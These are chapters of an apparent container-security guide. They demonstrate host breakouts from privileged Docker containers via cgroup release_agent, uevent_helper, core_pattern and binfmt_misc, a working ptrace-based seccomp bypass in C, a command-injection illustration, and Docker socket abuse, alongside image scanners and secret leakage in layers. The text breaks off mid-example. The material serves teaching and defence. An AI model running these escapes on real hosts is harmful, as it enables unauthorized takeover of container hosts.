Escaping from a container to the host is sometimes called a "breakout" or "jailbreak", by analogy with escaping from a prison.  
This section introduces techniques for breaking out of a container to the host.

## Privileged Container

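A privileged container not only allows access to every device on the host, it also runs without LSMs such as AppArmor and with an excessive set of capabilities, so it is not properly isolated and is almost equivalent to a process on the host.  
If a privileged container is compromised, the attacker can therefore escape to the host, so take care.

Linux has many helper mechanisms that can run arbitrary programs. One example is `call_usermodehelper_exec()`, a kernel API that launches a userland application from the Linux kernel.  
When a container is given excessive capabilities, as a privileged container is, and certain operations are possible inside it, these mechanisms can be used to escape to the host.  
This section introduces several ways to escape from a container to the host with them.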
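Whether a container holds such excessive capabilities can be checked from the `CapEff` line of `/proc/<pid>/status`. The following is a minimal Python sketch; `parse_cap_eff` and `has_cap` are hypothetical helper names, and the two masks are illustrative values of the kind typically seen for a default and a privileged Docker container (the exact masks depend on the kernel and runtime version).

```python
CAP_SYS_ADMIN = 21  # bit number from linux/capability.h


def parse_cap_eff(status_text: str) -> int:
    """Extract the effective capability mask (CapEff) from /proc/<pid>/status text."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split()[1], 16)
    raise ValueError("CapEff line not found")


def has_cap(mask: int, cap: int) -> bool:
    """Return True if the capability bit is set in the mask."""
    return bool((mask >> cap) & 1)


default_mask = parse_cap_eff("CapEff:\t00000000a80425fb\n")
privileged_mask = parse_cap_eff("CapEff:\t0000003fffffffff\n")
print(has_cap(default_mask, CAP_SYS_ADMIN))     # False
print(has_cap(privileged_mask, CAP_SYS_ADMIN))  # True
```

Inside a container, `parse_cap_eff(open("/proc/self/status").read())` gives the mask of the current process.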

## cgroup release_agent

cgroup v1 has a notification feature that fires when no processes remain in a cgroup; the kernel then runs the userland program registered as release_agent.  
If cgroupfs can be mounted inside the container, for example, this can be used to escape to the host as follows.

```sh
$ docker run --privileged --rm -it ubuntu:latest bash

root@927bb44baf0d:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

# Enable release_agent
root@927bb44baf0d:/# echo 1 > /tmp/cgrp/x/notify_on_release

# Create the program to run on the host
root@927bb44baf0d:/# cat <<EOF > /cmd
> #!/bin/sh
> ps aux > /tmp/output
> EOF
root@927bb44baf0d:/# chmod +x /cmd

# Register the path of the program, as seen from the host, as the release_agent program
root@927bb44baf0d:/# mount | grep overlay2
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/4HN7CVYLX5VML6M3TK4HLNKHX2:/var/lib/docker/overlay2/l/RWN3A47IS5OFAM3BM5YCAOFBYD:/var/lib/docker/overlay2/l/DCI4FWEI5GWG2MAABQGMYNWPTY:/var/lib/docker/overlay2/l/EAP7XMJNE3QFMGS5SOHUTYQPBB,upperdir=/var/lib/docker/overlay2/ed8b2e0d609b87c327e4c6061308d83acca13bc88fe96394b46dd5312af84277/diff,workdir=/var/lib/docker/overlay2/ed8b2e0d609b87c327e4c6061308d83acca13bc88fe96394b46dd5312af84277/work,xino=off)
root@927bb44baf0d:/# echo "/var/lib/docker/overlay2/ed8b2e0d609b87c327e4c6061308d83acca13bc88fe96394b46dd5312af84277/diff/cmd" > /tmp/cgrp/release_agent

root@927bb44baf0d:/# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

# Confirm that the command was executed on the host
ubuntu@docker:/tmp$ head /tmp/output
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.3 168656 12660 ?        Ss   Nov02   0:04 /sbin/init
root           2  0.0  0.0      0     0 ?        S    Nov02   0:00 [kthreadd]
```
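The host-side path used above is the overlay `upperdir` taken from the `mount` output. The following Python sketch shows that extraction step in isolation; `overlay_upperdir` is a hypothetical helper name and the mount line is a shortened, made-up example rather than real output.

```python
def overlay_upperdir(mount_line: str):
    """Return the upperdir option from an overlay line of `mount` output, or None."""
    start = mount_line.find("(")
    end = mount_line.rfind(")")
    if start == -1 or end == -1:
        return None
    for option in mount_line[start + 1:end].split(","):
        if option.startswith("upperdir="):
            return option[len("upperdir="):]
    return None


# Shortened, hypothetical mount line; real directory IDs are long hex strings.
line = (
    "overlay on / type overlay (rw,relatime,"
    "lowerdir=/var/lib/docker/overlay2/l/AAA:/var/lib/docker/overlay2/l/BBB,"
    "upperdir=/var/lib/docker/overlay2/abc123/diff,"
    "workdir=/var/lib/docker/overlay2/abc123/work,xino=off)"
)
print(overlay_upperdir(line) + "/cmd")  # /var/lib/docker/overlay2/abc123/diff/cmd
```

Because the container's `/` is backed by that directory on the host, a file written to `/cmd` in the container is reachable at `<upperdir>/cmd` from the host's point of view.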

## uevent_helper

A uevent is an event sent when a device is added or removed. When one occurs, the kernel runs the program listed in `/sys/kernel/uevent_helper`.  
This can be used to escape to the host as follows.

```sh
ubuntu@docker:~$ docker run --privileged --rm -it ubuntu:latest bash
# Create the program to run on the host
root@76017d104897:/# cat <<EOF > /cmd
> #!/bin/sh
> ps aux > /tmp/output
> EOF
root@76017d104897:/# chmod +x /cmd

# Write the path of the program as seen from the host
root@76017d104897:/# mount | grep overlay2
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/US76JCNP5VCQ2CUZIXYAU2VIQQ:/var/lib/docker/overlay2/l/RWN3A47IS5OFAM3BM5YCAOFBYD:/var/lib/docker/overlay2/l/DCI4FWEI5GWG2MAABQGMYNWPTY:/var/lib/docker/overlay2/l/EAP7XMJNE3QFMGS5SOHUTYQPBB,upperdir=/var/lib/docker/overlay2/bb19048f6e555df3c5387b9a5a14c14fdd592fb97c3bd60ea5925ee75036cecd/diff,workdir=/var/lib/docker/overlay2/bb19048f6e555df3c5387b9a5a14c14fdd592fb97c3bd60ea5925ee75036cecd/work,xino=off)
root@76017d104897:/# echo "/var/lib/docker/overlay2/bb19048f6e555df3c5387b9a5a14c14fdd592fb97c3bd60ea5925ee75036cecd/diff/cmd" > /sys/kernel/uevent_helper

# Trigger a uevent
root@76017d104897:/# echo change > /sys/class/mem/null/uevent

# Confirm that the command was executed on the host
ubuntu@docker:/tmp$ head /tmp/output
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.3 168656 12660 ?        Ss   Nov02   0:04 /sbin/init
root           2  0.0  0.0      0     0 ?        S    Nov02   0:00 [kthreadd]
```

## core_pattern

`/proc/sys/kernel/core_pattern` sets the output file name used when a core dump is generated, and because it accepts `|` (a pipe), it allows a command to be executed.  
This can be used to escape to the host with the following steps.

```sh
ubuntu@docker:~$ docker run --privileged --rm -it ubuntu:latest bash
# Create the program to run on the host
root@204c6661f442:/# cat <<EOF > /cmd
> #!/bin/sh
> ps aux > /tmp/output
> EOF
root@204c6661f442:/# chmod +x /cmd

# Write the path of the program as seen from the host
root@204c6661f442:/# mount | grep overlay2
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/UEAKPG6M42F22YWZ3I7HK3LESS:/var/lib/docker/overlay2/l/RWN3A47IS5OFAM3BM5YCAOFBYD:/var/lib/docker/overlay2/l/DCI4FWEI5GWG2MAABQGMYNWPTY:/var/lib/docker/overlay2/l/EAP7XMJNE3QFMGS5SOHUTYQPBB,upperdir=/var/lib/docker/overlay2/6acd5e8aa79a341ec8c970a77d9993617a7414b7c0e86fc719d1d54c718cc3d0/diff,workdir=/var/lib/docker/overlay2/6acd5e8aa79a341ec8c970a77d9993617a7414b7c0e86fc719d1d54c718cc3d0/work,xino=off)
root@204c6661f442:/# echo "|/var/lib/docker/overlay2/6acd5e8aa79a341ec8c970a77d9993617a7414b7c0e86fc719d1d54c718cc3d0/diff/cmd" > /proc/sys/kernel/core_pattern

# Start a process and make it crash with SIGSEGV
root@204c6661f442:/# sleep 100 &
[1] 16
root@204c6661f442:/# kill -SEGV 16
root@204c6661f442:/#
[1]+  Segmentation fault      (core dumped) sleep 100

# Confirm on the host that the command was executed
ubuntu@docker:/# head /tmp/output
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.3 168940 13144 ?        Ss   Nov13   0:05 /sbin/init
root           2  0.0  0.0      0     0 ?        S    Nov13   0:00 [kthreadd]
```
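
Because the leading `|` is what turns `core_pattern` into a command, a quick audit can start by classifying the current value. The following is a minimal sketch; the helper name `classify_core_pattern` is hypothetical and not part of any tool mentioned here.

```sh
# Hypothetical helper: classify a core_pattern value.
# A value starting with "|" means the kernel pipes the core dump to that program.
classify_core_pattern() {
  case "$1" in
    "|"*) echo "pipe" ;;
    *)    echo "file" ;;
  esac
}

# Inspect the current setting if it is readable from this environment.
if [ -r /proc/sys/kernel/core_pattern ]; then
  pattern=$(cat /proc/sys/kernel/core_pattern)
  echo "core_pattern is a $(classify_core_pattern "$pattern") pattern: $pattern"
fi
```

A `pipe` result is not malicious in itself, since many distributions register a crash handler this way. What matters is whether the handler path is the expected one.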

## binfmt_misc

`/proc/sys/fs/binfmt_misc` lets you register a program (an interpreter) that is run whenever a file with a given magic number or extension is executed.  
This can be used to escape to the host as follows.

```sh
ubuntu@docker:~$ docker run --privileged --rm -it ubuntu:latest bash
# Mount binfmt_misc
root@4af543b9eb3f:/# mount binfmt_misc -t binfmt_misc /proc/sys/fs/binfmt_misc

# Create the program to run on the host
root@4af543b9eb3f:/# cat <<EOF >/cmd
> #!/bin/sh
> ps aux > /tmp/output
> EOF
root@4af543b9eb3f:/# chmod +x /cmd

# Register cmd as the interpreter for files with the .sh extension
root@4af543b9eb3f:/# mount | grep overlay2
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/MVSWHTODE2R4PLCNOXNJ7MEHNX:/var/lib/docker/overlay2/l/RWN3A47IS5OFAM3BM5YCAOFBYD:/var/lib/docker/overlay2/l/DCI4FWEI5GWG2MAABQGMYNWPTY:/var/lib/docker/overlay2/l/EAP7XMJNE3QFMGS5SOHUTYQPBB,upperdir=/var/lib/docker/overlay2/f5cbdf158d44a4e44969eab02661e22c0886d7695e216b4590115f35d4e7cc3f/diff,workdir=/var/lib/docker/overlay2/f5cbdf158d44a4e44969eab02661e22c0886d7695e216b4590115f35d4e7cc3f/work,xino=off)
root@4af543b9eb3f:/# echo ':evil:E::sh::/var/lib/docker/overlay2/f5cbdf158d44a4e44969eab02661e22c0886d7695e216b4590115f35d4e7cc3f/diff/cmd:OC' > /proc/sys/fs/binfmt_misc/register

# Running a file with the .sh extension on the host executes cmd
ubuntu@docker:~$ /tmp/test.sh
ubuntu@docker:~$ head /tmp/output
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.3 168940 13144 ?        Ss   Nov13   0:05 /sbin/init
root           2  0.0  0.0      0     0 ?        S    Nov13   0:00 [kthreadd]
...
```
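
The string written to `register` follows the format `:name:type:offset:magic:mask:interpreter:flags` from the kernel's binfmt_misc documentation, where type `E` matches on file extension and `M` on magic bytes. To make the fields of the entry used above easier to read, here is a small sketch that splits such a string. The helper name `parse_binfmt_entry` is hypothetical, and it assumes `:` is the delimiter.

```sh
# Hypothetical helper: split a binfmt_misc registration string into its fields.
# Format: :name:type:offset:magic:mask:interpreter:flags
# Assumes ":" is used as the delimiter, as in the example above.
# The body runs in a subshell so the IFS and globbing changes stay local.
parse_binfmt_entry() (
  entry=${1#:}   # drop the leading delimiter
  IFS=:
  set -f         # disable globbing while splitting
  set -- $entry
  printf 'name=%s type=%s offset=%s magic=%s mask=%s interpreter=%s flags=%s\n' \
    "$1" "$2" "$3" "$4" "$5" "$6" "$7"
)

parse_binfmt_entry ':evil:E::sh::/tmp/cmd:OC'
```

For an `E` entry the `magic` field holds the extension (`sh` here), and `offset` and `mask` are left empty.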


================================================
FILE: source/security/image/README.md
================================================


================================================
FILE: source/security/image/scanner.md
================================================
# Image Scanning

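Docker images contain the software an application needs to run, and that software may contain vulnerabilities.  
As with on-premises servers and VMs, those vulnerabilities can be exploited for privilege escalation. You therefore need to know which vulnerabilities an image contains and manage the resulting risk.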

This section introduces tools that scan images to identify vulnerabilities.

## trivy

* https://github.com/aquasecurity/trivy

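trivy[^1] statically analyzes images. In addition to the packages of major OS distributions, it can also scan application packages installed with tools such as bundler and npm.  
It is also promoted for its accuracy, including a lower false-positive rate than other image scanners.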

```sh
$ trivy ubuntu:latest

ubuntu:latest (ubuntu 20.04)
============================
Total: 20 (UNKNOWN: 0, LOW: 18, MEDIUM: 2, HIGH: 0, CRITICAL: 0)

+-------------+------------------+----------+------------------------+-------------------+--------------------------------+
|   LIBRARY   | VULNERABILITY ID | SEVERITY |   INSTALLED VERSION    |   FIXED VERSION   |             TITLE              |
+-------------+------------------+----------+------------------------+-------------------+--------------------------------+
| bash        | CVE-2019-18276   | LOW      | 5.0-6ubuntu1.1         |                   | bash: when effective UID is    |
|             |                  |          |                        |                   | not equal to its real UID      |
|             |                  |          |                        |                   | the...                         |
+-------------+------------------+          +------------------------+-------------------+--------------------------------+
| coreutils   | CVE-2016-2781    |          | 8.30-3ubuntu2          |                   | coreutils: Non-privileged      |
|             |                  |          |                        |                   | session can escape to the      |
|             |                  |          |                        |                   | parent session in chroot       |
+-------------+------------------+          +------------------------+-------------------+--------------------------------+
| gpgv        | CVE-2019-13050   |          | 2.2.19-3ubuntu2        |                   | GnuPG: interaction between the |
|             |                  |          |                        |                   | sks-keyserver code and GnuPG   |
|             |                  |          |                        |                   | allows for a Certificate...    |
+-------------+------------------+          +------------------------+-------------------+--------------------------------+
| libc-bin    | CVE-2016-10228   |          | 2.31-0ubuntu9.1        |                   | glibc: iconv program can       |
|             |                  |          |                        |                   | hang when invoked with the -c  |
|             |                  |          |                        |                   | option                         |
+             +------------------+          +                        +-------------------+--------------------------------+
|             | CVE-2020-6096    |          |                        |                   | glibc: signed comparison       |
|             |                  |          |                        |                   | vulnerability in the ARMv7     |
|             |                  |          |                        |                   | memcpy function                |
+-------------+------------------+          +                        +-------------------+--------------------------------+
...
```

## snyk

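[snyk](https://snyk.io) maintains a vulnerability database for application libraries and provides tools that detect those vulnerabilities. Docker adopted snyk for image scanning, and since Docker Desktop 2.3.6.0 images can be scanned with just the `docker scan` command.[^2]  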

```sh
❯ docker scan ubuntu:latest

Testing ubuntu:latest...

✗ Low severity vulnerability found in tar
  Description: NULL Pointer Dereference
  Info: https://snyk.io/vuln/SNYK-UBUNTU2004-TAR-576242
  Introduced through: meta-common-packages@meta
  From: meta-common-packages@meta > tar@1.30+dfsg-7

✗ Low severity vulnerability found in systemd/libsystemd0
  Description: Improper Input Validation
  Info: https://snyk.io/vuln/SNYK-UBUNTU2004-SYSTEMD-576079
  Introduced through: systemd/libsystemd0@245.4-4ubuntu3.2, apt@2.0.2ubuntu0.1, procps/libprocps8@2:3.3.16-1ubuntu2, util-linux/bsdutils@1:2.34-0.1ubuntu9.1, util-linux/mount@2.34-0.1ubuntu9.1, systemd/libudev1@245.4-4ubuntu3.2
  From: systemd/libsystemd0@245.4-4ubuntu3.2
  From: apt@2.0.2ubuntu0.1 > systemd/libsystemd0@245.4-4ubuntu3.2
  From: procps/libprocps8@2:3.3.16-1ubuntu2 > systemd/libsystemd0@245.4-4ubuntu3.2
  and 6 more...
...
```

## Anchore

* https://github.com/anchore/anchore-engine

Anchore[^3] provides centralized management of image vulnerabilities. One of its distinguishing features is that it is programmable, because it is used through a REST API.

```sh
❯ anchore-cli image add docker.io/library/debian:latest

Image Digest: sha256:60cb30babcd1740309903c37d3d408407d190cf73015aeddec9086ef3f393a5d
Parent Digest: sha256:8414aa82208bc4c2761dc149df67e25c6b8a9380e5d8c4e7b5c84ca2d04bb244
Analysis Status: not_analyzed
Image Type: docker
Analyzed At: None
Image ID: 1510e850178318cd2b654439b56266e7b6cbff36f95f343f662c708cd51d0610
Dockerfile Mode: None
Distro: None
Distro Version: None
Size: None
Architecture: None
Layer Count: None

Full Tag: docker.io/library/debian:latest
Tag Detected At: 2020-11-15T04:23:09Z

❯ anchore-cli image list
Full Tag                               Image Digest                                                                   Analysis Status
docker.io/library/debian:latest        sha256:60cb30babcd1740309903c37d3d408407d190cf73015aeddec9086ef3f393a5d        analyzed
docker.io/library/ubuntu:latest        sha256:1d7b639619bdca2d008eca2d5293e3c43ff84cbee597ff76de3b7a7de3e84956        analyzed

❯ anchore-cli image vuln docker.io/library/debian:latest os
Vulnerability ID        Package                            Severity          Fix         CVE Refs        Vulnerability URL                                                   Type        Feed Group        Package Path
CVE-2011-3389           libgnutls30-3.6.7-4+deb10u5        Medium            None                        https://security-tracker.debian.org/tracker/CVE-2011-3389           dpkg        debian:10         pkgdb
CVE-2005-2541           tar-1.30+dfsg-6                    Negligible        None                        https://security-tracker.debian.org/tracker/CVE-2005-2541           dpkg        debian:10         pkgdb
...
```

# Vulnerabilities in Image Scanners Themselves

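Some image scanners analyze images statically, while others analyze them dynamically by running OS commands or package managers internally.  
If a dynamic scanner invokes OS commands unsafely, having it scan a malicious image can lead to arbitrary code execution.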
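
The following sketch illustrates this class of bug in general terms. It is not the code of Anchore or any other real scanner. The function names are hypothetical, and the argument stands in for attacker-controlled data read from an image, such as a package name.

```sh
# Illustration only: not taken from any real scanner.

# Unsafe: the value is interpolated into a string that a shell parses again,
# so shell metacharacters in the value are interpreted as commands.
unsafe_query() {
  sh -c "echo querying $1"
}

# Safer: the value is passed as a separate argument and is never re-parsed.
safe_query() {
  sh -c 'echo querying "$1"' sh "$1"
}

unsafe_query 'pkg; echo INJECTED'
safe_query 'pkg; echo INJECTED'
```

With the unsafe variant the text after `;` runs as a second command, while the safe variant treats the whole value as data.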

For example, Anchore 0.7 invoked OS commands as described in the following issue, and because the input was not validated properly, this could lead to arbitrary code execution.

* https://github.com/anchore/anchore-engine/issues/430

Some reported vulnerabilities remain unfixed, so consider your use case when choosing a scanner, and keep the scanner itself up to date.[^4]

[^1]: https://github.com/aquasecurity/trivy/
[^2]: https://docs.docker.com/engine/scan/
[^3]: https://github.com/anchore/anchore-engine
[^4]: Testing docker CVE scanners. Part 2.5 — Exploiting CVE scanners / https://medium.com/@matuzg/testing-docker-cve-scanners-part-2-5-exploiting-cve-scanners-b37766f73005


================================================
FILE: source/security/image/secrets-in-layer.md
================================================
# Keeping Secrets in Image Layers

A Docker image is made up of layers, much like OverlayFS: applications and libraries are added on top of a base OS layer.

For example, prepare and build the following Dockerfile.

```sh
$ cat Dockerfile
FROM alpine:latest
RUN echo "secret" > /secret.txt
RUN rm /secret.txt

$ docker build -t test .
Sending build context to Docker daemon  10.61MB
Step 1/3 : FROM alpine:latest
 ---> d6e46aa2470d
Step 2/3 : RUN echo "secret" > /secret.txt
 ---> Running in 32f150d1804c
Removing intermediate container 32f150d1804c
 ---> 2cac5efedab4
Step 3/3 : RUN rm /secret.txt
 ---> Running in be0569fd1744
Removing intermediate container be0569fd1744
 ---> b29dd8898773
Successfully built b29dd8898773
Successfully tagged test:latest
```

This Dockerfile produces three layers.

* Layer 1 ... `FROM alpine:latest`
* Layer 2 ... `RUN echo "secret" > /secret.txt`
* Layer 3 ... `RUN rm /secret.txt`

To check this more visually, [dive](https://github.com/wagoodman/dive) confirms that there are indeed three layers.[^1]

```
$ dive test
┃ ● Layers ┣━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ │ Current Layer Contents ├────────────────────
Cmp   Size  Command                            ├── bin
    5.6 MB  FROM b1c62b187dcd114               │   ├── arch → /bin/busybox
       7 B  echo "secret" > /secret.txt        │   ├── ash → /bin/busybox
       0 B  rm /secret.txt                     │   ├── base64 → /bin/busybox
                                               │   ├── bbconfig → /bin/busybox
│ Layer Details ├───────────────────────────── │   ├── busybox
                                               │   ├── cat → /bin/busybox
Tags:   (unavailable)                          │   ├── chgrp → /bin/busybox
Id:     b1c62b187dcd114a7252e45a4f03577549d822 │   ├── chmod → /bin/busybox
77149b5467c73eefaa956260bd                     │   ├── chown → /bin/busybox
Digest: sha256:ace0eda3e3be35a979cec764a3321b4 │   ├── conspy → /bin/busybox
c7d0b9e4bb3094d20d3ff6782961a8d54              │   ├── cp → /bin/busybox
Command:                                       │   ├── date → /bin/busybox
#(nop) ADD file:f17f65714f703db9012f00e5ec98d0 │   ├── dd → /bin/busybox
b2541ff6147c2633f7ab9ba659d0c507f4 in /        │   ├── df → /bin/busybox
                                               │   ├── dmesg → /bin/busybox
│ Image Details ├───────────────────────────── │   ├── dnsdomainname → /bin/busybox
                                               │   ├── dumpkmap → /bin/busybox
                                               │   ├── echo → /bin/busybox
Total Image size: 5.6 MB                       │   ├── ed → /bin/busybox
Potential wasted space: 7 B                    │   ├── egrep → /bin/busybox
Image efficiency score: 99 %                   │   ├── false → /bin/busybox
                                               │   ├── fatattr → /bin/busybox
```

Because the image retains every layer, a specific layer can be extracted.  
In other words, even if the Dockerfile deletes the secret, as with `rm /secret.txt`, the secret can still be recovered.

```sh
$ docker save test > test.tar
$ mkdir test
$ cd test
~/test$ tar -xf ../test.tar
~/test$ ls
b1c62b187dcd114a7252e45a4f03577549d82277149b5467c73eefaa956260bd       b6433cc45f11a118c68ef34b9b3192f7c3514ee1a36c85d26df80122d058af4a  manifest.json
b29dd88987735c67e31b37de3c0c44abf656b42e6ce396defbfd967ba772e027.json  c8e83ef6a497050f640412539ecd335c4f7cf72808a75aea4ef1d0e04bb28156  repositories

$ cat b29*.json | jq
"history": [
    {
      "created": "2020-10-22T02:19:24.33416307Z",
      "created_by": "/bin/sh -c #(nop) ADD file:f17f65714f703db9012f00e5ec98d0b2541ff6147c2633f7ab9ba659d0c507f4 in / "
    },
    {
      "created": "2020-10-22T02:19:24.499382102Z",
      "created_by": "/bin/sh -c #(nop)  CMD [\"/bin/sh\"]",
      "empty_layer": true
    },
    {
      "created": "2020-11-02T09:05:38.780508124Z",
      "created_by": "/bin/sh -c echo \"secret\" > /secret.txt"
    },
    {
      "created": "2020-11-02T09:05:39.890868911Z",
      "created_by": "/bin/sh -c rm /secret.txt"
    }

$ cat manifest.json | jq
...
    "Layers": [
      "b1c62b187dcd114a7252e45a4f03577549d82277149b5467c73eefaa956260bd/layer.tar",
      "c8e83ef6a497050f640412539ecd335c4f7cf72808a75aea4ef1d0e04bb28156/layer.tar",
      "b6433cc45f11a118c68ef34b9b3192f7c3514ee1a36c85d26df80122d058af4a/layer.tar"
...

$ tar xf c8e83ef6a497050f640412539ecd335c4f7cf72808a75aea4ef1d0e04bb28156/layer.tar
$ cat secret.txt
secret
```
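
The manual search above can be automated. The following is a minimal sketch, assuming the legacy `docker save` layout shown above, where each layer is stored as `<id>/layer.tar` (newer Docker releases may write a different layout). The helper name `find_in_layers` is hypothetical.

```sh
# Hypothetical helper: print every layer tarball under an extracted
# `docker save` directory that contains the given path.
# Assumes the legacy layout <dir>/<layer-id>/layer.tar.
find_in_layers() {
  dir=$1
  name=$2
  for layer in "$dir"/*/layer.tar; do
    [ -f "$layer" ] || continue
    # tar -t lists member names; grep -x requires an exact match.
    if tar -tf "$layer" | grep -qx -- "$name"; then
      echo "$layer"
    fi
  done
}

# Usage, from the directory where test.tar was extracted:
#   find_in_layers . secret.txt
```

Any layer it prints still contains the file, regardless of whether a later layer deleted it.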

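To prevent cases like the one above, do not write secrets into the image at build time. Instead, pass them in at runtime, for example through environment variables, or use a dedicated secret mechanism.[^2][^3]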
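
One way to keep a build-time secret out of every layer is a BuildKit secret mount, as described in the build enhancements documentation.[^3] The following is a minimal sketch. The helper name `write_dockerfile`, the secret id `mysecret`, and the file names are placeholders chosen for illustration.

```sh
# Hypothetical helper: write a Dockerfile that reads a secret through a
# BuildKit secret mount instead of copying it into a layer.
write_dockerfile() {
  cat > "$1/Dockerfile" <<'EOF'
# syntax=docker/dockerfile:1
FROM alpine:latest
# The secret is mounted at /run/secrets/mysecret only while this RUN step executes.
RUN --mount=type=secret,id=mysecret wc -c /run/secrets/mysecret
EOF
}

# Usage (requires Docker with BuildKit enabled):
#   write_dockerfile .
#   DOCKER_BUILDKIT=1 docker build --secret id=mysecret,src=secret.txt -t test .
```

The secret file is supplied on the `docker build` command line and is not part of the build context copied into the image.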

---

[^1]: https://github.com/wagoodman/dive
[^2]: https://docs.docker.com/engine/swarm/secrets/
[^3]: https://docs.docker.com/develop/develop-images/build_enhancements/


================================================
FILE: source/security/seccomp-bypass.md
================================================
# Bypassing seccomp

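seccomp is a mechanism that restricts specific system calls, but on **Linux kernels before 4.8** it can be bypassed with ptrace.  
On those kernels the seccomp filter is applied before the ptrace tracer is notified (that is, before the invoked system call actually runs). The tracer can therefore change the registers after seccomp has inspected them and have a restricted system call executed.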

The concrete steps are as follows.

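1. Call `fork(2)`. The child issues a permitted system call whose arguments carry the number and arguments of the prohibited system call, and the parent traces the child's system calls
2. Once the permitted system call has passed the seccomp check and the tracer is notified, the parent rewrites the registers so that the prohibited system call is invoked instead
3. The kernel then executes the system call found in the rewritten registers, so the prohibited system call runs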

In code, this looks as follows.

```c
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/user.h>
#include <sys/signal.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <sys/fcntl.h>
#include <syscall.h>


void die (const char *msg)
{
  perror(msg);
  exit(errno);
}

void attack()
{
  // mkdir("dir", 0777);
  // Call the permitted getpid, passing SYS_mkdir and its arguments as extra arguments
  syscall(SYS_getpid, SYS_mkdir, "dir", 0777);
}

int main()
{
  int pid;
  struct user_regs_struct regs;
  switch( (pid = fork()) ) {
    case -1:  die("Failed fork");
    case 0:
              // Have the parent process trace this process
              ptrace(PTRACE_TRACEME, 0, NULL, NULL);
              kill(getpid(), SIGSTOP);
              attack();
              return 0;
  }

  waitpid(pid, 0, 0);

  while(1) {
    int st;
    // Resume the child process
    ptrace(PTRACE_SYSCALL, pid, NULL, NULL);
    if (waitpid(pid, &st, __WALL) == -1) {
      break;
    }

    if (!(WIFSTOPPED(st) && WSTOPSIG(st) == SIGTRAP)) {
      break;
    }

    ptrace(PTRACE_GETREGS, pid, NULL, &regs);
    printf("orig_rax = %lld\n", regs.orig_rax);

    // Skip unless this is a syscall-enter-stop (rax holds -ENOSYS on entry)
    if (regs.rax != -ENOSYS) {
      continue;
    }

    // Rewrite the registers to switch to a different system call
    if (regs.orig_rax == SYS_getpid) {
      regs.orig_rax = regs.rdi;
      regs.rdi = regs.rsi;
      regs.rsi = regs.rdx;
      regs.rdx = regs.r10;
      regs.r10 = regs.r8;
      regs.r8 = regs.r9;
      regs.r9 = 0;
      ptrace(PTRACE_SETREGS, pid, NULL, &regs);
    }
  }
  return 0;
}
```

Create a container with a seccomp profile that prohibits `mkdir(2)`.

```sh
$ cat seccomp.json | jq 
{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {
      "name": "mkdir",
      "action": "SCMP_ACT_ERRNO",
      "args": []
    }
  ]
}

$ docker run -it --security-opt seccomp:seccomp.json ubuntu:latest bash
```

Running the code above inside that container confirms that the seccomp restriction is bypassed and `mkdir(2)` is executed.

```sh
[root@d7799354119f tmp]# mkdir dir
mkdir: cannot create directory 'dir': Operation not permitted

[root@d7799354119f tmp]# ./a.out
orig_rax = 39
orig_rax = 83
orig_rax = 231
[root@d75f3506a41d tmp]# ls
a.out  dir
```
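
Whether a host falls into the affected range can be roughly checked from the kernel release string. The following is a sketch only: the helper name `kernel_older_than_4_8` is hypothetical, and because distribution kernels may carry backported changes, the version number alone is not conclusive.

```sh
# Hypothetical helper: succeed if the given kernel release (e.g. "4.4.0-21-generic")
# is older than 4.8.
kernel_older_than_4_8() {
  major=${1%%.*}            # text before the first dot
  rest=${1#*.}              # text after the first dot
  minor=${rest%%[!0-9]*}    # leading digits of the remainder
  [ "$major" -lt 4 ] || { [ "$major" -eq 4 ] && [ "$minor" -lt 8 ]; }
}

if kernel_older_than_4_8 "$(uname -r)"; then
  echo "kernel $(uname -r) predates 4.8"
fi
```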


================================================
FILE: source/security/sensitive-file-mount.md
================================================
# Sensitive File Mount

Mounting certain files into a container can make it possible to escape to the host.

## Docker Socket

If the socket used to communicate with the Docker daemon is mounted into a container, the container can send arbitrary HTTP requests to the daemon's API and thereby escape to the host.

```sh
ubuntu@docker:~$ docker run --rm -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu:latest bash
# The list of containers can be retrieved
root@3ba2c2752b26:/# curl --unix-socket /var/run/docker.sock http:/v1.24/containers/json
[{"Id":"3ba2c2752b264486b24d5ae00c2a4b6d00b341fe8001f1e703ecadd4ee44655e","Names":["/eager_wozniak"],"Image":"ubuntu:latest","ImageID":"sha256:bb0eaf4eee00c28cb8ffd54e571dd225f1dd2ed8d8751b2835c31e84188bf2de","Command":"bash","Created":1605360446,"Ports":[],"Labels":{},"State":"running","Status":"Up About a minute","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"fdc64dc8a87c0c6a25e6186c5713f03c36a6be049d9a800d745a4d0c7e6c93de","EndpointID":"609757590f10f891224587c9f48abbf3f243705660c98cfb8489aa5cecf29f51","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[{"Type":"bind","Source":"/var/run/docker.sock","Destination":"/var/run/docker.sock","Mode":"","RW":true,"Propagation":"rprivate"}]}]

# Create a container with the host's / mounted
